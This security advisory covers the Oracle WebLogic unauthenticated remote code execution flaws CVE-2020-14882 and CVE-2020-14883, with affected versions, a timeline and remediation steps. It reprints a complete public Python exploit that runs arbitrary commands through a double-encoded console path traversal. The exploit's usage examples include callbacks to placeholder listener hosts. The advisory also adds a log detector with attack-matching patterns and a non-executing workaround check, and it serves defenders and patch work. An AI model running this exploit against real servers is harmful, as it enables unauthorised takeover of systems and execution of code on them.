[Update] CVE-2020-14882 | WebLogic Remote Code Execution Vulnerability Advisory

Published 2020-10-30

0x00 Vulnerability Overview

Vulnerability ID: CVE-2020-14882

Date: 2020-10-30

Type: RCE

Severity: High

Remotely exploitable: Yes

Affected scope: Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
 

WebLogic Server is one of the main products of the US company Oracle. It is used to develop, integrate, deploy and manage large distributed Web applications, network applications and database applications, and is one of the leading commercial Java (J2EE) application servers.

 

0x01 Vulnerability Details


 

On October 28, 2020, a proof of concept was made public for the Oracle WebLogic Server remote code execution vulnerability (CVE-2020-14882) fixed in Oracle's October 2020 Critical Patch Update. A remote attacker can exploit it with a single crafted HTTP GET request: a double-URL-encoded path traversal (/console/images/%252E%252E%252Fconsole.portal) bypasses the administration console's authentication check, and the handle parameter of console.portal is then used to instantiate an arbitrary class with an attacker-controlled constructor argument (tracked separately as CVE-2020-14883). Chained together, these let an attacker control the WebLogic Server Console and execute arbitrary code without any credentials.

On October 29, 2020, it was reported that Oracle's patch for CVE-2020-14882 can be bypassed by a then-unpatched (0-day) variant: even after the WebLogic patch has been applied, an attacker can still bypass the console login and take control of the WebLogic server. The resulting risk is severe. The vulnerability details are as follows:

Vulnerability ID   Product                  Component   CVSS base score   Affected versions
CVE-2020-14882     Oracle WebLogic Server   Console     9.8               10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0
CVE-2020-14883     Oracle WebLogic Server   Console     7.2               10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0

 

The public exploit (EXP) is as follows:

 

#!/usr/bin/python3

# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0  - Unauthenticated RCE via GET request
# Exploit Author: Nguyen Jang
# CVE: CVE-2020-14882
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html
# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

import sys
import requests
import urllib3
from urllib3.exceptions import InsecureRequestWarning

# Admin ports are usually served over HTTPS with a self-signed certificate;
# silence the warning that verify=False would otherwise print on every request.
urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 3:
    print("[+] WebLogic Unauthenticated RCE via GET request")
    print("[+] Usage : python3 exploit.py http(s)://target:7001 command")
    print("[+] Example1 : python3 exploit.py http(s)://target:7001 \"nslookup your_Domain\"")
    print("[+] Example2 : python3 exploit.py http(s)://target:7001 \"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\"")
    sys.exit(1)

target = sys.argv[1]
command = sys.argv[2]

request = requests.session()
headers = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}

print("[+] Sending GET Request ....")

# A single request performs both halves of the chain:
#  - /console/images/%252E%252E%252F : a double-URL-encoded "../". The console's
#    authentication check exempts static-resource paths under /console/images/,
#    but the path is later decoded and resolves to /console/console.portal
#    (CVE-2020-14882, authentication bypass).
#  - handle=<class>("<arg>")         : console.portal instantiates the named class
#    with the string argument. The Coherence MVEL ShellSession evaluates the
#    expression, which calls Runtime.exec (CVE-2020-14883, code execution).
# Command output is not returned in the response, so confirm execution out of
# band (DNS lookup, HTTP callback), as the usage examples above do.
GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('" + command + "');\");", verify=False, headers=headers)

print("[+] Done !!")
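The request pattern in the exploit above is easy to hunt for in the WebLogic access log. The following detector is an added example written for this advisory, not code from the original page or from the exploit author. It parses Common Log Format lines (the format WebLogic writes to access.log), percent-decodes each URI repeatedly so that double-encoded, single-encoded and literal "../" forms compare equal, and flags two things independently: a traversal under /console/ (the CVE-2020-14882 bypass) and a handle=<fully.qualified.Class>( value (the CVE-2020-14883 class-instantiation primitive). The sample log lines are constructed for the example, not captured traffic; the finding labels and the assumption that an HTTP 200 means the console answered the request are the example's own.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in the Common Log Format WebLogic writes to
# access.log; they are not captured traffic. Line 2 is the public PoC request,
# line 3 a lowercase, POST-based variant through /console/css/.
SAMPLE_LOG = """\
10.0.0.5 - - [29/Oct/2020:10:12:33 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4521
10.0.0.7 - - [29/Oct/2020:10:12:40 +0000] "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27id%27)%22) HTTP/1.1" 200 1092
10.0.0.7 - - [29/Oct/2020:10:13:02 +0000] "POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 1092
10.0.0.9 - - [29/Oct/2020:10:14:15 +0000] "GET /console/images/logo.png HTTP/1.1" 200 8113
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Directory traversal anywhere under /console/ once the URI has been decoded
# (matches %252E%252E%252F, %2e%2e%2f and a literal ../ alike, in any case).
TRAVERSAL_RE = re.compile(r'/console/[^?\s]*\.\./', re.I)
# handle=<fully.qualified.ClassName>( : console.portal instantiating a class
# by name with a string argument, the primitive behind CVE-2020-14883.
HANDLE_RE = re.compile(r'[?&]handle=([A-Za-z_][\w$]*(?:\.[A-Za-z_][\w$]*)+)\s*\(')


def normalize(uri, rounds=3):
    """Percent-decode until the value stops changing (bounded), so that
    double- and single-encoded forms of the same path compare equal."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def classify(line):
    """Return a finding dict for a suspicious request line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    uri = normalize(m.group('uri'))
    findings = []
    if TRAVERSAL_RE.search(uri):
        findings.append('console-auth-bypass-traversal')
    h = HANDLE_RE.search(uri)
    if h:
        findings.append('console-handle-class:' + h.group(1))
    if not findings:
        return None
    return {
        'ip': m.group('ip'),
        'time': m.group('ts'),
        'method': m.group('method'),
        'status': int(m.group('status')),
        'findings': findings,
        # Assumption: a 200 means the console answered the traversal; a 302 to
        # the login page or a 403/404 means the request did not reach it.
        'reached_console': m.group('status') == '200',
    }


def scan(log_text):
    """Classify every line; returns the findings in log order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


if __name__ == '__main__':
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    for f in scan(text):
        print(f"{f['time']} {f['ip']} {f['method']} HTTP {f['status']} -> {', '.join(f['findings'])}")
```

Run it with the path to an access.log (it scans the embedded sample when no argument is given). The class name captured from handle= is worth keeping in the alert: the ShellSession gadget only exists where Coherence is bundled, and other public chains name a different class, so the captured name tells you which variant was tried.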

 

0x02 Remediation Recommendations

Temporary measures:

Because the patch for this vulnerability is at risk of being bypassed, it is recommended to temporarily block external access to the administration console (/console/console.portal). Block the whole /console/ path prefix at the firewall or reverse proxy rather than the literal string /console/console.portal: the exploit reaches console.portal through /console/images/ with a double-URL-encoded traversal (%252E%252E%252F), so a rule that matches only the literal path will not stop it. Apply the October 2020 Critical Patch Update (see the references below) as well, and keep the administration port unreachable from untrusted networks.
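After putting the workaround in place, verify it from the outside. The following check is an added example for this advisory, not code from the original page or from Oracle: it sends the CVE-2020-14882 traversal path with no handle parameter, so it tests only whether console.portal answers an unauthenticated request and executes nothing on the target, and it does not follow redirects so a login redirect is visible as such. The mapping from HTTP status to verdict is the example's own assumption (a 200 on this path is treated as "console still reachable"); a response it does not recognise is reported for manual inspection rather than guessed at.

```python
import ssl
import sys
import http.client
from urllib.parse import urlsplit

# The CVE-2020-14882 traversal with no 'handle' parameter: it tests whether
# console.portal answers an unauthenticated client and executes nothing.
PROBE_PATH = "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel="


def assess(status, location=None):
    """Interpret the response to PROBE_PATH.

    Assumed mapping (this example's, not the advisory's): a 200 means the
    console servlet served the page to an unauthenticated client, so the
    bypass still works; a redirect to the login form, a 401/403, or a 404
    means the request was stopped before reaching it, which is what the
    workaround must achieve.
    """
    if status == 200:
        return "EXPOSED: console.portal reachable without authentication"
    if status in (301, 302, 303, 307, 308) and location and "/console/login" in location:
        return "OK: redirected to console login, bypass not effective"
    if status in (401, 403):
        return "OK: access denied"
    if status == 404:
        return "OK: console path not served"
    return "UNKNOWN: HTTP %d, inspect manually" % status


def probe(base_url, timeout=10):
    """Send the probe to http(s)://host:port and return (status, verdict).
    Redirects are not followed so a login redirect is visible as such."""
    u = urlsplit(base_url)
    if u.scheme == "https":
        ctx = ssl.create_default_context()
        ctx.check_hostname = False          # admin ports commonly use self-signed certs
        ctx.verify_mode = ssl.CERT_NONE
        conn = http.client.HTTPSConnection(u.hostname, u.port or 443, timeout=timeout, context=ctx)
    else:
        conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=timeout)
    try:
        conn.request("GET", PROBE_PATH, headers={"User-Agent": "cve-2020-14882-workaround-check"})
        resp = conn.getresponse()
        resp.read()
        return resp.status, assess(resp.status, resp.getheader("Location"))
    finally:
        conn.close()


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: python3 check_console.py http(s)://target:7001")
    status, verdict = probe(sys.argv[1])
    print(f"HTTP {status}: {verdict}")
```

Run it against every address the administration port is reachable from, including the reverse proxy's public side, since a block applied only at one hop leaves the console exposed on the others.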


0x03 References

https://www.oracle.com/security-alerts/cpuoct2020.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14882

https://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html


0x04 Timeline

2020-10-20  Oracle releases the October 2020 Critical Patch Update security advisory

2020-10-21  VSRC releases its security advisory for the October patch update

2020-10-28  Vulnerability PoC made public

2020-10-29  Patch for the vulnerability reported to have an unpatched (0-day) bypass

2020-10-30  VSRC releases this security advisory

 

0x05 Appendix

CVSS scoring standard (official site): http://www.first.org/cvss/